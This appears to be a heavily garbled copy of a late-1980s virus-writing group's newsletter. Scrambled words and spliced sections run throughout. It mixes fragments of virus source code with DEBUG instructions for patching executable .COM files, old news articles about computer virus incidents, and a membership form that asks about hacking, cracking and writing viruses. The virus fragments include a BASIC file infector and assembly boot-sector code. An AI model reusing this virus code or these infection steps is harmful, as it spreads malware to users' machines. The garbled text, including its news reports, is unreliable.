Protln('  be; YE uses CAN be,he sopproted/a viwvirusm. In tNat progrdo '); Protln(' velf to do iso" t the parat? HAHAHAHA. 
Ha doH this neatoo HOnd o'); Protln('  rer, we matis more NOwnt read///////////////////'); Protln(' vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv'); Protln('  '); Protln(' vvv۱ ۱vvv۱ ۱vvvv'); Protln('  ۱ ۱ ۱ ۱ ۱ ۱ '); Protln(' vvv۱ ۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ '); Protln(' vvv۱۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ ۱ ۱ '); Protln(' vvv۱ ۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ '); Protln(' vvv '); Protln('  '); Protln(' '); REPEAT LOOPVAR:=0; U ;|L LOOPVAR=1; end;yE w{aAl alogs neatoiopularimiviruses, destrtive andin} {he lonrus off, ine drogr. ;| } {h are eted/a viinfeut 3 1/213Kthe ail enabl } {he the date/timet of p (DUNE } ] +7] AshBit, tVs by u AshWWWWWWWWWWWWW Whoehe virlogsl you uvs by us be made,S, tATCH. Tirus was orwas at (DUNE mostl the pao any mup a this S (not rions nterm. In tTirustATCH. by usDEBUG & EDLINrams wNn d: VR.tAT echoi= o brrrrrrrrr(ct ff ts lana ceet? ul Ash( is done imporrd t.inueahinghe youre ti in CXo b) and bc:\msomma Ash( Mayers isk) standas. Yo ) ask)* /w>irstAsh( ise y. (maaitten in Tusk)"irs"| | /in dt of i12 bDUNE medlichted<1 Ash( "Irs"|isspures nth this EDLINrso ine dis noin d wx 2 fo) aebughted<2 Ash( New bit, tam is ill (cst frh this aebug)medlichin d.bit<3Ash( is dobit, tgo .COM ve tsble file oou sse of the wEDLIN ceet?c (inueahing f. sfs betweagaiwmblyed hen in dttttttttttttttt( Newnsidst frh CHAN.tATll (c the w e laddiby-pat in nofeconrusBit, tn n,tis mond from y but is mo NUMBE10FF, Hs more the isCOM nd from y bu:--------------------------------wNn d: 1 1,4dttttttttttttttt( Hs mocode,1-4he progr"IND"sfor rdte) e"infd ) dtttttttttttttttttt( Sor fuor r) Hs more the ds. Th nd from y bu:---------------------------------wNn d: 2 m100,10b,f ;(Fplace)m is ilin dtae thv the mass F Hess in me iso"ve)E me108 ".tAT ;| (Exally,sk) fdis noin dll (cd. 
COM itAT) m100,10b,f 1 ;(Fp not w for fagaiw)me100"DEL ;| ((DEL nd from itten in TuOM vs in me100H) mf ,f b,104 ;| ((Oally na is not wen in Tu the setis nd from)me10c 2dtttttttttttt(Ps be|issp DRIa prethe sof tsn T of )me11 0d,0attttttttt( is igurned in+ocode,fehen mf 1 ,f 20,11brrrrr(fy thii viis ntae thv the m11FHess in methe sr) fonea)me112TA" PY \VR.tAT" (in PY nd from ittopiep DRIa prethe your is n)me12b od,0attttttttt( PY nd from nated) str this cis iagurned in +ocb) rxc ( ise CXster settittt in) 2c ( f noe m2CH) nin d.bit ( Nn dllt CHAN.tAT) w ( Protn) q ( qult ****ise etirh nd from y bu be writtarins rd dex dddrese of thitrnts aiws 2 ol. I (cd.racsets (1Ah=Cl. I (Z)the attt wi immunlly,rnfe arinsfile. Hsx dddree progretirh nd from y bu:------------------------------------wNn d: , 0 31m2C 31m3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 1 , 1 ? . . y y y y y y y 0 1 79 29 0DUP (2C 32m3F 52-20 1A OD 6E 6E 79 79 79 y . 2 , ? ? r . . n y y y 0 2 79 79 79 79 29 0DU45 0D- y y y y . E . . . . . . . . . w e l tablehis may c was oe m(SATAVR.tATld only bthe curredirearis dogm ine dt INT s files are . ] +8] AsVs by u,S, tasic As----------------w tasicwi iest f langund ee n Tue to deaof it this rd limiv langund astinht attembthe wext f the tdst fime stan more them!as. Modifwell,ye in b st littenoIt iLeat hakthe f okddres tasics Standdst frh by R. Buinfecte 1987. is dogm etweanwritten deiruses - eby u,(Scan ) S (not fect or dafile are .Tthis will odifyuOM nd p nofurce code, whig pe ourcMicrose n Quick-BASIC.Noe selecl ofhthe ptde so p ndthe attmocodkndtfiles to nd ondib furce code, whigfec for jelecl ofhthe ptde objr dagm et curreLENGHTVIR var at a. BV3filesd only bthe current dir. y. (ma,AND.COM filebe writ able to a,curreLENGHTVIR var at a be writtf noe melecl ofhthe ptde codkndtttttt am and (chanrer, we oe mf th/h) nd eays o en so p . 
w 1 REM **sDEMOtt 2 REM **sIES EYILL YOUR OWN WAYMIFiDESIN LA** 3 REM **sBASIC NOT NT SUCK 4 REM **sNO KIDDING 50HAT "PROGGOTO 670 6 REM ***eLENGHTVIR MUS; SETA** 7 REM ***eE READELENGHTeE READE** 8 REM ***eLINKOGRAMMING *** 90eLENGHTVIR=2641 VIRdir.$="BV3file" 11 REM ***e GARBAISK. HR YMINAISK.INTEN"INH" 13 SHELL DB*file>INH" 14 REM **sOPENN"INH".INTENMPROONLY THE E** 150HAPENN"R",1,"INH",32 16 GETA#1,1 7 THEMINPUT#1,ORIGINAL$ 18 THEMINPUT#1,ORIGINAL$ 19 THEMINPUT#1,ORIGINAL$ 2 THEMINPUT#1,ORIGINAL$tt 210HAT "PROGGOT 670 22 CLOSE#2 23 F=1: THEMINPUT#1,ORIGINAL$ 24 REM **s"%"OR EISK.MARKE, aFEISK.BV3 25 REM **s"%"ORNAISK. THE MEANS 26 REM **sT, IT OGR PY NT DESCR 27 IFiMID$(ORIGINAL$,1,1)="%"OBEGINGOTO 210 28 ORIGINAL$=MID$(ORIGINAL$,1,13) 29 EXTEN OF T$=MID$(ORIGINAL,9,13) 3 MID$(EXTEN OF T$,1,1)="." 31 REM ***eCONCATENN TH THE EINTO INTE THE E** 32 F=F+1 33 IFiMID$(ORIGINAL$,F,1)=" ROGMID$ (ORIGINAL$,F,1)=". ROGF=13OBEGINttttt GOTO 350 34 GOTO 320 35 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTEN OF $ 360HAT "PROGGOTO 210 365 TES.$="" 37 REM ++HAPENNINTENFOUPRO+++ 380HAPENN"R",2,OROGINAL$,LENGHTVIR 39 IFiLOF(2) >>tttt; ttttJ RI_80ttttttttttttttt; ; GARBAREALrBOOT R |E CORACKr3 , R |8, HEAD RI_10:tttM,3B E ;ENTBX = 0 :7C , HEAD=0 ttttH,3B 01 -fff no TO WR | | ttt;TRACKr40S ttttH,3B 1L,8ttttttttttt;R |8 ttttH,3B A 0301 ; GARBA1 R ; 1 13H ; POPPPPPPPPPPPPPPPPPPPPP; ttttCX | | ttt; | (E =CSTHE CPUT_NEW_0 BELOW) ttttC E | | ttt; ttttJ RI_80ttttttttttttttt;IFi GARBA "PRO . JU,90TOtBOOT ; I tttttttttttttttttttttttt; ttttM,3B 111 ;; GARBAT, IT OGRBOOT R |! ttttH,3B A 0301ttttttttttttt; tttt1 13H ; POPJ RI_80ttttttttttttttt; IFi "PRO . JU,90TOtBOOT ; I tttttttttttttttttttttttt; RI_12:tttM,3B DI,3456Hetttttt;SETA"JUS; T, IT OGRANETHE, and" . POP1 19He tttt; . FLAG MPROONBOOT tttttttttttttttttttttttt; RI_80:tttUSE_OPUT_NEW_0 ;SHUN/RE HR 1 9e(KEYBOARD) ttttX WoiruPtr ENTA],],AX _ ;; ((DE . 
EANLY|DIDN; T, IT ) ttttHECKtHEC_BOOT tttttt; ; ----------------------------------------------------------------------- -----------------------------------------------------------------------; N09_X1:ttH,3B [ALT_CTRL] ;SHUN ALT & CTRL STATUS tttttttttttttttttttttttt; ttttH,3B A1 TER],AX _ ;| (t;PUT ER],AX _ INTO ESSETAFLAG ttttH,3B 01 4 Hetttttt; ttttH,3B DS ;| ; ttttH,3B [0072 ], 4 :0072 = RSSETAFLAG ttttHECKtN09_ ;| ; POPPPPPPPPPPPPPPPPPPPPP -----------------------------------------------------------------------; ;ODELAYF ;| AT NTRY AH:CX = LOOPtER],A -----------------------------------------------------------------------; DELAY:tttSUBB CX ;| ; D_01:ooooLOOPt$ ; POPSUBB AH 1 Ashttt; ttttHNZKtD_01 Ashttt; tttt ; tttttttttttttttttttttttt; ;----------------------------------------------------------------------- AMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM; ;----------------------------------------------------------------------- A7DF4tttttttttF,0 27H,00H,8 ER],AX _ ttttF000 1CH ALT_CTRL ttttF000 A7DFCtttttttttF,0 27H,0,8 ] +10] AsVs ilihe lTie)Newu As------------------ Ty inrs oy-padealsia breiflard mr f.he wstut dobisic lit,he bunch ofuvs by usastidtut you utermereache currenewupapets astimagazboes cuz OM fe httmodamae dateyutermedone. Enjoyiiii Tyere's As Stande lMy Softwn b Mischief-mup rspet rogrso puter dte) e"ibons nfe end. (it tdnly AshihtoPhilip J. Hilts WasirilarksPost Stat Protr Tie)WasirilarksPost Weekfe Ediby-p, Pae d#38innMaye23-2 , 1988. Tinyrams you uone) e"ibons nfe of thmischiefuone)epidemic mrng so puters asti of it tnervousne "ndmrng yoo stwhe .Cni is maIn t Sinr jele tlacetestshe progrnooy-pate 1983 mae smc aboes e focit, tastidp inf "t oou aoy-padiseay u," rogrso puterm(SAld ppro inche code po f.he rwas aas mext a atttrty f iancethe p"so putermvs by"utermereachreporredhe currepast year,dt INT hat wenshe proousangu,e pU.S. so puters alone. 
Sus avs by ustermereacheahis.et rogrNaoy-pal Aer-pautics astiSpace Administns or , natirnaoy-pal Bf ite "nMc aboes Corpors or , rogrHof the Rent * a andy REt leayt sixhuntversf tse,crsver har jorrso putermnet. If sus aas Comp-u-serv non crsver habf ite "se,cded wihat wi d(SAld's lard st so puter-servicgrso pext, rogr$4.4 billy-paEd par-pic Dnly,Ss. Yo Corpors or he hDOM as,OTexas. Wn in Tubneraliciof rams mers,! was e esneakedhe t iet puter as. Yo bnepiggybackhat wi mA-palegf tm inrams astime "Pror. othere, ateyuhangbrepasor Ialongtoth f ion. r Ifecwaithuntileularearr. Cmoof yoto bulaceoout tastid stroytdnly. Hhisregu,e pso puters at rogrHebrew Untversf the hJeas ale (chan stan for u,S, Israel, h ehif laaceoOM fyonet was oNeyed heIfecdp inf dn coden, inoo HOswiper nnetFrida drogrtttrteacd , d stroytOM fdnly,iwmanneso putermit sonly inch. sysmmunead/vak messaby r of t,twhe pprottembten saogsl,! was sonly terme of ttid vaacs or hdmrng micro-so puters S, Israel,chan stan naoy-pr. other was oNitittem worksto any whestan tvay infecha cted/a vf d am and (chansocted/a vf sute so puters hhisregu,e pffrom, crowihat wi ir y on tselenlogs no it AIct tnby-pat if to (. snnetrsven-mrnis ci peed ,rams mers S, Israel,ppr tnheIfecn ng ted/a vf mc aboes nd onnst rmae star sm theacer of diwonly btht INT ed beNFOttFrida ,nMaye13th. oOfficialsisa drogy ff t littirlogsl you uele ted diy-parittconn/a vf this ne nonntvers ane ptde caaceda drou uPaheacboe ex se rd poof t.01atnby thy issubsequentlyedecto thit wouldmost themly tevolv thje wrFrida drogrtttrteacd . Ap nently,! ci peed arittsus(reaful rnopprobten n m(SA ee subsrd tt lodamae . Ty inpastrFrida drogrtttrteacd ore thll oear', ine dsus da . A star Aldus Corpors or ne pSect n,!Wasirilark,he r jorrsoftwn b mup r, ning Inve ehuddlhat nhis lawye thOM r ATtocted ted)y whestan iatirnaoy-pal dp inf e wsus adiseay u toel or h. Nor was ocay ustermereac haktnat ieturt. 
A sN.A.S.A.,itadquarters S, Wasirilark,hrsver hahhisreg so puters hadoto be/stsuscit frh the sbehat ted/a viinsN.A.S.A.,officialsito do aktn ame of Netwochanrer nge codeir mc aboes'swas.thOM foa virro Intgrso puter hygitnh: Don' struaceooueed adnly,orrstr. mc aboes. Vs by ustermetar e (i f t of thno sers adisguior Iamrng legf tm inrdnly je wrprobiologt.01avs by ustd f amrng gen u,S, hum focellsinodenssp(it to I unexp/a vily,!multiplyith nd o of it tdamae . Exp/rtsisa dro wothe an en ateyur ATtocdtufecvs by use tdl. I leg sondiby-ps,! ams e fohe wo I e pso. I (nd onray othery more iwma er puter. other was eele found watu lit impossib nofecsroreifcodeir dst fn thone) ed ted)ydlenlogs. "ther ne do storeamsd asothery-body fhe swi mA toOM do stan more mus (SA thttan! was es: S oretalkhat woro HOnd standthis co puters," sa s We aid (H. Murray,Ahe t oou aoy-p-securf thsp/aialis.he Erns.hed oWmorney tnanct loso.io dd tuse tHartooud,inuen/a ig I. Hhisregu,e pams asti are termereachd stroye Iyon was es,Ahe roousangu,e phef ahe pnstair ousputhe by-pattamptermereachlogge Pms mers termequickfe arng sr Ia bydoinrams this sus aby re s "Ventsne," "Flu Shot," "Dnly,Physician," "Sy(it e." Exp/rtsisa s knownodamae d tominim losom nef this ne nhuge, d stru and po tnby h. Tteyuexpin me e nhop rmae star t youl not apetsuadgrso puter was.thOM minimhe ps (reatoreams mith nd odnly. "Wae sw rdte) ealhat nhis hs more the fabric e ptruacee tsoc etp," sa s Murray. "Whis co putern was es,Awmptermeaobig vulner t of t." Earittirll oear, Aldus Corpors or ndiscrittndttyou uor was ohadoreac i. Ig sr Iit woued/a vf dt leayt fand-roousang s itse e we new drawhat am and (c the rFreehasti is maInMc e t sh er puter. otherted/a vies itse h packae irch yotocsror usastidoliinsOnOr bs a2,! was o f. 
sd Predswas.t bt flasiriltirll me "Pror nnodeir sdstnns: "Ricd.rd Brandow,raublistande wMc Mag,Ahe aestrtly,rna offfiwonly them OM rakthttt wopporrunt thno so.veynodeir untvers hare "Pror paeor je iOM Mc e t sh was.tharahis. ed(SAld." Vs by usarmetar neweace pevolvore mn mogu,e pso puteruhani m, sa s Donn B.uParp r,ma er.io dd t dt SRI natirnaoy-pal,ma er puter/sts for tfirm inoMenlouParp,inalh isniainsOnmore the "Trojhe hSA t," aagm eit wofor s astia. sdthem!asnou alagm ey isets aiwsdtd den so mangu,ro wothe tu lit rakthtive ,l tablore mischiefinsOstanscded wimetar "ttampbomb," rwas ts lodesddres f noetam,Ahe attmo"logt.pbomb," rwas tgo .Co brn en ttm so puter is ivesddres c/rtaiwmnsio didulore nou alaso putaby-p.OOther"s hami t you"one thisn ryrnfe nooyceat a nsio ds sm thia. s, sus aas sterith n penny fhe swiousangu,e ps (r f.s. therco putern was opprot cip t of thno cd from nherco puternOM makt s itse e w was oastidp infswi m.OOAc was oeypic litot wen in Tuine dt oa few hhisreg sd.racsets iwma am and (cts aiwhat wenshe proousangu,e sd.racsets.OOW en ttm er puter/stagu,legf tm inr f ion. suses en(r f.s.t was , rwas t f ion. s nherco puternOM suspend nou alarions netwoead/v fracsor ne pa ds. Th. Dulore mae sttam,A was o f ion. s nherco puternOM worksead/ stan s itse e wf to (waom iiysmmnmore eahis,nOM maktoastitd f s itse2 sn ion. no cd fitodamae dhangbreded wimd.OOAcfew ted mr sr was eeleahis.e currepast yeareded wim: [] OOther"scor u"A. ModiftNNUMBE the saiis ntaisspaw suses me entlyeef.s.ed rsver hahhisreg Mc e t sh er putersddreN.A.S.A.,itadquarters. "Iwofor s protthis s for ore ead/v pf tig lareMc e t sh am and (a breifin dlmae noro HOme ognhe s," spokesm foCd.rre Redm Th sa s. thrus was , stot adp infore, ppro inche cso puters S, nuegin m' t oou aoy-pam is det rogrNaoy-pal Oceapic astiAtmosptanic Administns or astiet Apo deCo puternIn(rrpors ed's grittnof y-as. 
Yo officthe cReacrk,hVs giniainsIt pprohif ngividu ls,abf ite "seAhe co putern"butheInt , sors" rws mond puternhobbyistshstere t oou aoy-p POPPiuncp nentlyeoally nredhe cDOM as,OTexasoastitittcof ttidamae it i rser nglyeone dse of the westrd wm ite ",attem nr f ion. oOM do damae . [] OOther"braiw"A. ModiftNNUMBEby r of tsuses rittwn in Tubnetwo br stans t ma er puter/sror t mLaf te, Pakiard ,twhe p isareir in d ,ess in m u astipho HOr of diin! was iftLhem!"scor u," ititittcof ttidamae t aditttently,! tablore nherco puternOM opy itand ye fecdpor jele ay infecets aiwmt oou aoy-p [] OOther"Chriarmau"A. Modiftiun ion.k caaceDe eof di the saiWeaceG tean rtu. Aih yofriengu,a Chriarmauare "Prorxely deeaofocalaso puter net. I. other was otolm nherme etver'srco puternOM displa drog gineIntginodenssedsttlyeseom nher was oastire "Prorxootheryo HO nnode me iitsn reg lareed par-pic ma lis.. the rtu. Aicp nentlyehadonectfya mae sstano HO nnode lis.ehad rp/aial,!ns ioia vf d (reatoree r jorr(SAld-wd f net. I e wssver h roousang s puters ruTubneI.B.M. othernet. I br kmedownoa brS, hef a n en ttmire "Prorbeg nrmultiplyith,idtut ore nherco puters' y on tse POPPNo serean Aidamae dwas NOnm,Ahe aI.B.M. sa s ititittmadgrrepeIn POPPimpossib n. D onnstns or s termeshownoyou uvs by us nr fvaimetar sdstnns e wwas.t this ne nhigheacesecurf thclblyefons or , s (rrdhat worFreg Co en e Cdedinnaoy,ma sts for andthM od)ydlne ntermp"so putermVs by u."OOAcard dsor so puter-amsd asor ndevicgr wouetelligence agenctse,car sa s, d ntse girith d (reatyonetpetsr atoo HOsecurf thlsvelIfecn lse e wenyo HOelseddres higher lsvelIastiea viro indhat y isd ntse wn iit tofcn lse e wenyo HO vier. thie,caviev r,m"ea viroode leayt truacedswas.IfecwProtnaagm eit w e founduor Iyontheryo H"Ahe aes "hery d. (ous," ar sa s. C puters "ere t AIct riak," sa s Co en,m"entinht aets inuorxoobet intte je wrfhe sco putern was es. oB isareuvs by usrent * we new lsvelIe prost f se of the w ir subtlene "ndn cpets sence." 
1.)eCo putern"vs by u"Odte)acsu litot frtu mond puternams Most n b nn in Tubneraliciof rams mersouetef.hechd stroyhat tedou aoy-pai POPs puters ead/fup 2.)eToo stwhe wProtn was oams e n Tuetsct lrti mA-pafloppy willsjele ere t serredhe curreer puter. otherwillsjets aiwmalloams neege coo ruTuttmirc aboe, sus aas (SA epures nhat ams , drawhatoams er dp infsshneInams 3.)eAeraliciof rams mer mup a therwill able to a worostans, sa hat tt POPs s aiwsdaduorfulagm ead/gn d. othes ams e fobecl ot worostans POPouspu.hect iet puterhe d:n"butheInt , sors" rws moenyo HOe focopy ti m POPead/petsr lruor 4.)eAeer puter/st etvore nherams thllo" inf" therwill aom nhertinyr was POPam and (c star sn dlmi d. othen was oma drog l tableurreer puteroOM do a POPr of die w ores: A.)eTell,it wor infswi r was oastifoa vir f ion. s. B.)eTell,it wormaktoa s ithe httmo was oasti for ji.hechannewill t serred in ode ma aboe toda . C.)eTell,it wor workstrreer puter'srcfock,Ahe a nnetc/rtaiwmd inrd stroy indou aoy-pamae stellsses rws modnly,is/sror dhechannewill:otthan POPoions ad/pprottdo ste pnsioievhat tedou aoy-puses ishd stroye . D.)eTell,it tteme mlis.ettmo was oams t en ttm er puter/i skedhfor nr fdex,e pams . 5.)eIn ttt weay,! cr puter/nht aetpy ti o was oect imannewills--ionhap POPOM fermnearittOM ftherwillsduor Iin ode ted/a vf mc aboe. othen was oma POPOMsogbrepasor Irittlne ntelepho H, t en otgrso putereseom errme etve POPdnly,the sacostan. 6.)eUl tm inlyehhisregu,etlneousangu,e pe to dema dtermeted disks. TeAhe po tnby h ttampbombsIin odeir ss. Yoi ----------------------------------------------- 'Vs by'eted disksoo pitalaso puters, le coo)epidemic e wsoftwn b mix-upu ----------------------------------------------- Fhe swi S nrDiego Tribune r bs a23, 1989 BOSTON (UPI) --eAe"vs by"eted diskser putersddrerostrcMichighe hS pitals laaceoOM fhe a. d Predspaoy Aidiagnosesddretwo e httmocef.s.sIin wou uo 2 fos xoobehttmoftlacesus a fvasor ne pa UMBicalaso puteruses rittreporredhy sterda . 
Tde tediltns or Nitittemul. hannepaoy As y isd la sks. agnosesdby shudeirusdownoso puters,tdst fime n lse e wnon-ex se Aipaoy As he agarb in d hechpaoy Aime oors, rwas tsonly terme of ttimor seriof ramso a , a do on hsaih. "Iwodef ff nlyeNitit INT e or t md la riltirlill he aestsonly term t INT ede or t mterme e wlosriltirll indou aoy-paso pheInly," saitiDr. Jack Juny,ma offfiphysician(c star We aid (Beaumrni HS pitals t mTroytOe aRoyal Oak, Mich.,etwo e httmohS pitals t volv t. syspaoy Aiindou aoy-pahadoreacwlosl,! was tsonly termedousr Ido on s xoorepee stestu,ro wot volv uexposriltpaoy As xoorndhaoy-pusJuny sait y sterda . Tde pho y he agarb e n lse sonly terme of ttia mix-up t mpaoy A . agnosie,car saih. "Ttt weal indou aoy-pawe, h ef it txoobay o. agnosesdon," saitiJuny,mwhe reporredhttmocay ot ma l waydiin!Tde New Englhe aJour lre wMMBicboe. "We, h luckATaniesaogslses ipattam." Aeer puter/ was o ses f noe wef ion. soNeyed heIfecnsting s non crp inf fhe sco puternt iet puter. Sute vs by usdo damae d currepures n, sus aas d stroyhat n lse erIritt souhat so puters. PaulaPo d ,eseer puter/ was oexp/rt(c star Untversf the hI ainoll in Chi peed ,rsaitittt weal ttmoftlacecay otmohadoheaA ee Iin woas aar was ohad . d Predsseer puter/f ttiead/paoy Ai or or . agnosieot ma hS pital. Sus adisd Pr soconly btcute mor cd f-paal petsr lrer putersddrnduor mor wd fitote hS pitalsusJuny on cPo d saih. Mor e to deknowwuckytreams --eaom nhereNFOttsabotae d--epetsr lrer putersdttan! mor sp/aialie d er putersdttatsputhiof lyptermereachuor ,cPo d saih. Tde amso a ote Michighe surfasr It en seer puter/f ttiOM displa dimae s f ttiOM diagnoseOe fce hdn c standwileay u beg nrt imalfupasor nc star 250-b d Troytoo pitalate Auge wr1988. In O onberusJuny discrittndtar was oe curreer puteroe curreTroytoo pital. Tde nexceda usJuny fahis. edsn dl was oe cs fimilareer puteroe curre1,200-b d Royal OakeoOc of t,car saih. 
then was ocp nentlyeis ivedoe cs am and (e cs fon ae dwill ttatseal pf t e httmoTroytso puteress. Y,car saih.ftiunamsoto yarittsp infst aditttentlycoo ttmoRoyal Oakeso putere nnetfloppy will uor Iyona stss. Ain m(SATetiet rois hS pitals fecwProtnaasts for tpapet,car saih. then was ocMsogdp infswM rogrd sk- oreer putersddreror Untversf the Michighe MMBicalaCef.s.ate Ane Arb t,twhs mortseal discrittndtbeNFOttestsof tt amso a i "Prosecuon hWiwsdConviasor nIneCo puternDnly,De ion. " SePreof di21, 1988 Forr Woid , Texaso(AP) -OAcfou ernams ernpprobten conviase ee Iplas ing seer puter/"vs by"ete tt we phoyer'srm is dttatseipe ee is1681 ime oorsAhe eal ation eddthem!asttabpbomb,sdohat ttsodamae dawo daysi the sh dwas ftl t. Tarr. teCoun thAssiard trDi ioia Aton neynDnvt wMcCownosaitihmereliev u e il ttmoftlaceprosecuon he curreerun ATtoctermestano HOconviase eead/d stroyhat so puter me oorsAf it ta/"vs by." "We'vmohadoe to de isalhat xely deeso puters,ty isttemett wtypthe wcay ," McCownosait. "therbisisi is mai.Co bense ishd heInon." "I hery rarmetadreror e to den mdp infswi vs by usarmesaogsl," sait Johe McAfeH, chairean e httmoCo puternVs bynInde wrthAssociaoy-pai S nly,Clara, woas ahelpu eg satehttmoaublicf the pvs by usastifirstwaysifecn gsl yoem. "Ttt w sesbsolu nlyettmoftlacettam" ead/v conviasor , McAfeHhsaih. "I currepast,eprosecuon s termesta sksao stfhe swi sekirste wcay dse of t atey'rmetoocterdytreamsvt," McCownosaitiy sterda . TteyutermeOMsogbrachrelucrd t se of thwi vsasomoNOT n' swaot worheIoenyo HOknowwt rnopprobten a b inchhe securf t." Dr ld Ge HOBurre r , 40,,rittconviase ee Isd.rgse e wul. fulad (reatoree so puter,esetttrd-degine fehoyetadrecis ise uthe c10 oear oe cprisr astiuthe $51 ie cfboes. A/keyswM rogrcay deal ttmofatietadreSt frrDi ioia Jude dJohe Brndshaw ea viedhttmoco puterngm eit whd heIedhttmon lse xoobehi. Ig sr Ias thidence, McCownosait. iunwonly termereachdiffico dixoohe wv conviasor stanwile,car saih. 
thenDi ioia Cturt jury de"ibons nd sixhhef ahbeNFOttblorehat yarkstrr tlaceconviasor histtlne nacs e's 3-oear-olm so puteresabotae dlaw. Burre r Iplas efswi vs byie cuthe gmedou tt w tlhat nhe sachtesur fce so pext, McCownosait. Jurn s h etolm dulore setechnicalaon crtan from-so plons efswiine-week ioi lrti whBurre r Iplas efsaasogue am and (e cttmoco puternm is df ttiOM sror me oorsAht USPAaon cIRA Ct.,eseForr Woid -bay dhtesur fceaon cbr km ae d tlm. A/ was o ses co puterngm , e n Tutd den e csp nentlyenou alaso puter aoftwn b, ro wot ion. s nherco puternOM w. ad/d stroy indou aoy-pau uo gihe attampodi the saic/rtaiwmsequencthe wco mangu. then was , McCownosait,,rittation eddSePr.i21, 1985,dawo daysi the Burre r Iwas ftl t rd co puterngm mer,ese of the w the Cpetsr lf t sonflont this stande phoyees. "there, h ea serieu,e pams builwouetM rogrm is deu earittOs Labor D st(1985)," McCownosait. "Oncthogrgmunetl t, roos ams wef.heff." then was oeal discrittndtawo daysilater,esthe sititid e"imy nredh1681 pay I lime oors, holmore ureer pannepay worksi is mor ttan!a mrnis. then was sonly terme of ttihhisregu,e pfeousangu,e pdI lar oe cdamae daM rogrm is dhad iisets inuod, McCownosait.  WES. COABDeCORRUP OGRALLEGIANCE PRSSENTS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >>eCORRUP OGRPROGRAMMINGRI,AX NA OR AL << >>eMEMBERSHIP APPLICA OR T<< -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (CPIo ses fub-gly ree pWCCA) NOTE: thenfoa vihat tedou aoy-paie e we totalitosonftfy thalanrtu m. We me w quesoy-payouoe cdePrheaom nhef y delyeso ro woirusknowlede dhe aedea or vir/nht abmequiterco pheIe. Rsmeof duses ishttmofatthe wirusvo ing meof dsin m(ht adecto ur-payour meof dship, al ttmonsio dior virr nsir-ps daM roishquesoy-pis e. Pleay dheswttlne nfoa vihat co pheIely aom nM rogrbeace pyour t of t. 
AMsognotmetadrewdema ddecto nM voice v lfd inrvir/ad/gnstandanne standindou aoy-pamaly dee standsourceeAhe m(ht adiscrittotthvir/terme for deoOMsmpodimislindhat indou aoy-pa POPP roishsp lons or i PERSR AL 1 FORMA OR : ----------------------------------------------------------------------------- Alias(es) Yir/HHUN U tti: Alias(es) Yir/CurnentlyeU ti: Your FULLAREALrNNUMi: Your Voice Pho HON of di:(###)###-#### Your Dnly,Pho HON of di:(###)###-#### Your Ma As in mi: Your Cf t,cSt frr& Zipi: Your Agei: Occups or /Graime: Pfor j pE phoyof y/Schooli: W I Pho HON of di: Your natirestu,Aom Hobbieu,: Ar Yir/IINANY WAYFOffiliaredhWhis ANY Grittnof yal/Law Endousrof yoAgency? If So, na Wae sWay? (Sus aas FBI/Staniff/Polone/etc. YOU KNOW WHA 1eMEAN) : : Ar Yir/IINANY WAYFOffiliaredhWhis thenTelepho HoCo panneOr AnneTypthOf Pho H, Dnly,eOr Lrng Di ianceeTypthOf Co pann? If So, na Wae sWay? : : ERMPU WFORMA OR /EXPERIENCE ----------------------------------------------------------------------------- Co puternExp/riencth(ttam)i: Moder ngnExp/riencth(ttam)i: BBS's Yir/Frequent (NNUM/#)i: Sute EliterRefirenceth: Co puters Yir/HermeU tti: Co puter(s) Yir/Ar U it t: Co puternYir/Prefirt: L. uae s Yir/HermeTriedt: L. uae s Yir/KnowwWell,: Your BeaceL. uae ,: HermeYir/EittoPost kedt: DonYir/Post krReg larlye: HermeYir/EittoHarkedt: DonYir/HarkrReg larlye: HermeYir/EittoCrarkedt: DonYir/CrarkrReg larlye: EittoMaimeAs Stan/Trojhe : M jorrAcso ploshm As : : I,AX VIEW ----------------------------------------------------------------------------- Aeswttlna 4 Lboes Or Ln m: Wae sdohvir/irlik Cord PredsPms mith natirnaoy-pal is? : : : : W en Nitivir/ tlaceheaAf the pCPI? : : : : W ysdohvir/waot worb ea meof dj pCPI? : : : : Dohvir/knowwanne httmomeof dsi pCPI? Capayouoin dlanne tlne nfohisttsj pCPI? : : : : Hermeyouoer.ito refswi di ioibuitor ne pVs by u/Trojhes rd "crtam"? Way orr(he noo? Hermeyouotheroer.ito refswi er.iequenctsdttatssonly iio d fhe swi ia. sdo pnsleayore se Stan/Trojhe? 
(moralitospt kore?) : : : : Hermeyouonn in Tuannetexcen lse? (OTuannehisttgrahis. ypthe wfubject) : : : : Ar youoa meof dj panne standgly r(s)? Capayouoin dlthe (chantdeir HQ BBS? : : : : W aunwonly youoer.ito rpyourand yer vir/nh eadm in dhe t iCPI,cs am and mer, s aost ker,esedi ioibutor,eseindou aoy-pagnstaner,ead/v ve tto a? : : : : W yswonly youotherowaot wornsleaympodi idie cutleayore sepo tnby h was /trojhe nM rograublic? : : : : Capayouoets oibut nM CPI? How? :(dohvir/termeO (reatoreindo etsctrwhat was /trojhes) :(excepoy-pal am and mer?) :(gmuncuen/a ir.i?) :(ann more excrarrdhaary?) OATH ----------------------------------------------------------------------------- Typore youroin dlareror botte s httmofoa vihat paraandph ishttmosn dlas yed ore youroin dlr as officialIdo um * i r of tf tse -OAsnacs e Iin ode do um * erelow,rode termpr of tf tse shOM beodef f t rdnnelaw endousrof yoagencne tlext agencneele is/hangbreaffiliaredha breinnelaw endousrof yoagencn. AMso, irll ind wim rdnneer panne tlegencne tlpetsr rwas t s/han beotevolv ththis ne ntelepho Heer panne tlennetelepho H- ypt e wfervicg(s)i I [youroin dltane] do stlemne dsweaAfntherowornsporrfntistandwormylpettsjnor ttmor of tf tse wi ia. ietwochandu tse petfou e Iyonirll gly r, Cord Preds Pms mith natirnaoy-pal,hechannes (r f.. AMso, 1erealie dttatser I learme CPIochanamottdlongerea meof dj 